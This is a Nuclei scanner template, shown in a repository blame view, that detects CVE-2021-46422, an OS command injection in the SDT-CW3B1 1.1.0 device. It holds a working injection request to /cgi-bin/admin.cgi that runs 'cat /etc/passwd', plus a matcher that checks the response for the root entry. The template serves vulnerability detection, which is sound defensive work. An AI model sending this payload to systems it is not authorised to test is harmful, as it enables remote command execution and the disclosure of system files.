nuclei-templates/cves/2021/CVE-2021-46422.yaml

29 lines
588 B
YAML
Raw Normal View History

2022-05-18 08:01:57 +00:00
id: CVE-2021-46422
info:
name: SDT-CW3B1 1.1.0 - OS command injection
author: remote
severity: high
2022-05-18 08:40:28 +00:00
reference:
2022-05-18 08:01:57 +00:00
- https://www.exploit-db.com/exploits/50936
2022-05-18 08:40:28 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
2022-05-18 08:01:57 +00:00
classification:
cve-id: CVE-2021-46422
2022-05-18 08:40:28 +00:00
metadata:
verified: false
tags: cve,cve2021,injection,rce
variables:
cmd: "cat+/etc/passwd"
2022-05-18 08:01:57 +00:00
requests:
- method: GET
path:
2022-05-18 08:40:28 +00:00
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
2022-05-18 08:01:57 +00:00
matchers:
- type: regex
part: body
regex:
2022-05-18 08:40:28 +00:00
- "root:.*:0:0:"